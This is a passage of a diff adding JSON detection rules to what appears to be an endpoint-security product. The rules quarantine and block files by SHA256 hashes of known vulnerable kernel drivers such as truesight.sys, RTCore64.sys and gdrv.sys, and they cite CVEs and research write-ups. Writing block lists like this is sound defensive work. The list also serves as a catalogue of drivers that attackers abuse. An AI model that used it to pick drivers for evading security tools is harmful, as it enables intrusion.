+ "value": "5fc8d085871c6d4f6b44f6eabafc3e7d6f49024166e65defdd0248d1de5babd0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "302170b5-68d9-54b3-bcd4-46cddbe26835",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.485833Z",
+ "creation_date": "2026-03-23T11:45:31.485837Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.485847Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "04fb17d680c7c1ce2f971c2e17cd4108d2c995f9cc702d8da1fdd439bbd103ef",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "302c29f4-1254-5b9b-bc20-af456cfe1570",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.489255Z",
+ "creation_date": "2026-03-23T11:45:31.489258Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.489266Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3697d13461d0bb6f23edc37d010869bdf421a51593fb264f2d1a38b8fdda755c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "30366c09-965f-531f-8451-cf776f6f7d5c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.472914Z",
+ "creation_date": "2026-03-23T11:45:30.472918Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.472927Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0e8595217f4457757bed0e3cdea25ea70429732b173bba999f02dc85c7e06d02",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3036e53f-17c1-55e2-8dd4-d2dc8cd599ff",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.156055Z",
+ "creation_date": "2026-03-23T11:45:31.156057Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.156063Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ef856b5e6a5846b8aa505272515b762a5b18b8a0496fff4950488d17eefc2095",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3037de6b-ee20-5ca0-8ea3-5b7c48a5114d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.487719Z",
+ "creation_date": "2026-03-23T11:45:31.487721Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.487726Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3fc98ecceccf767b976b7c4cd9f0aa5e0783e62da8ec5d52411d0b61686e4f24",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "306d5e2a-6d5b-5e05-94fe-bfdf81ba9fb9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.480922Z",
+ "creation_date": "2026-03-23T11:45:30.480924Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.480930Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7277130afa0b1506998d7bc58567b0d83f52a27175f4c7c4a7186347095fceed",
+ "comment": "Vulnerable Kernel Driver (aka TdkLib64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3072fd59-8f3d-575f-b644-b0a8b3a13f05",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.500576Z",
+ "creation_date": "2026-03-23T11:45:31.500579Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.500587Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5ffdcfce9414bc1d674d0fd7ae9a531cfc9217791d0d4ea929cddfbce02cc67f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "308162f9-c939-5503-8df3-6f059da42411",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.460850Z",
+ "creation_date": "2026-03-23T11:45:30.460854Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.460862Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5da0ffe33987f8d5fb9c151f0eff29b99f42233b27efcad596add27bdc5c88ff",
+ "comment": "Vulnerable Kernel Driver (aka RTCore64.sys) [https://www.loldrivers.io/drivers/e32bc3da-4db1-4858-a62c-6fbe4db6afbd/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "30904c18-8ec2-596f-966b-074a79b80ea1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.609129Z",
+ "creation_date": "2026-03-23T11:45:29.609131Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.609137Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f4ff679066269392f6b7c3ba6257fc60dd609e4f9c491b00e1a16e4c405b0b9b",
+ "comment": "Gigabyte vulnerable driver (aka gdrv.sys) [CVE-2018-19320] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3096dde6-140a-57af-a8a0-ca44f8585351",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.153578Z",
+ "creation_date": "2026-03-23T11:45:31.153580Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.153585Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "92bde364ca9d62fea430b42e32d3a4eeb9b2001bc30f85f0c152831ae47b1680",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "30a1a9c7-62d4-51f2-8fad-bb8466ce86bb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.150160Z",
+ "creation_date": "2026-03-23T11:45:31.150161Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.150167Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8ad4b24c22e3c23290097ba585975c79c16727e4dddbcbcbc02082949cab8310",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "30a4f139-183a-5a19-923c-787ee9310cf2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.830071Z",
+ "creation_date": "2026-03-23T11:45:31.830073Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.830078Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b7b307837c1af0367f6f341ab69a915bf1f67d0107d489993511b6ff7e0c2751",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "30bc2798-87d5-5380-a2d7-03a7d89548b9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.834897Z",
+ "creation_date": "2026-03-23T11:45:30.834901Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.834911Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "43cfa6624c071648e67c03527b2dce064ff116b944431348380c8d74d3c39e3b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "30bf226d-06e6-5644-955c-56d0ddddeced",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.613614Z",
+ "creation_date": "2026-03-23T11:45:29.613616Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.613621Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "399effe75d32bdab6fa0a6bffe02dbf0a59219d940b654837c3be1c0bd02e9aa",
+ "comment": "Vulnerable Kernel Driver (aka AsrSetupDrv103.sys) [https://www.loldrivers.io/drivers/19003e00-d42d-4cbe-91f3-756451bdd7da/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "30cf82db-4ec2-57e1-82bc-854032dd265e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.474559Z",
+ "creation_date": "2026-03-23T11:45:30.474563Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.474571Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a3a6146a681d25f7d8be88fb36e37821a351205d9be2843c4e7cc0b366984b39",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "30d7ce0d-8147-5428-9573-3cdbc2504450",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.471539Z",
+ "creation_date": "2026-03-23T11:45:30.471543Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.471552Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b3e645e8817696fa5d5e2255f9328f3b6a2e5fce91737f4d654ff155dc9851e5",
+ "comment": "Vulnerable Kernel Driver (aka AsIO.sys) [https://www.loldrivers.io/drivers/bd7e78db-6fd0-4694-ac38-dbf5480b60b9/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "30deaf50-6a53-572a-8e2c-7e049a1c5699",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.824664Z",
+ "creation_date": "2026-03-23T11:45:31.824666Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.824672Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1b3cdee0d8bd1ba2745d26c5a00583677735063c693d6947b5d7657fe9289053",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "30e4b39f-ccf0-5a86-8cb5-c80b2abe598c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.973234Z",
+ "creation_date": "2026-03-23T11:45:29.973236Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.973242Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a3cf1a6edd205e04653b4338c077072ee753cde0a692490ecaf7afde27df5f0b",
+ "comment": "Vulnerable Kernel Driver (aka elbycdio.sys) [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "30f015e7-438e-5949-9ad6-3d04f8d543d6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.476147Z",
+ "creation_date": "2026-03-23T11:45:31.476151Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.476160Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bfda0d884c65b21699dd9f345fc78c1d684875d131fb46053526d491265eb357",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "30f50bc5-f7b4-5014-9038-68b9b452823f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.974662Z",
+ "creation_date": "2026-03-23T11:45:29.974664Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.974669Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3912c38f4c09b107ee9bbb60f43a8193d6bacf00bfb3b59b7b146d76594797cf",
+ "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "30ff047a-93d7-5a4b-b652-2daeff5203cb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.488344Z",
+ "creation_date": "2026-03-23T11:45:31.488346Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.488351Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "58a17f674f721cbf28ea2d27db218dc6926628fe663d1e7fc7fe9677b69fa395",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "310c3d06-dbe1-5bab-ae9f-47e0ed2cb117",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.623027Z",
+ "creation_date": "2026-03-23T11:45:29.623029Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.623035Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fb5e65aec819c5a91ef0ce0fec0a957826b5e1ac9bac559a1b4201a3870462a3",
+ "comment": "PassMark vulnerable driver (aka DirectIo32.sys and DirectIo64.sys) [CVE-2020-15479] [https://github.com/eset/vulnerability-disclosures/blob/master/CVE-2020-15479/CVE-2020-15479.md] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3119f1e5-d603-5f84-bc80-1f2a095e9d56",
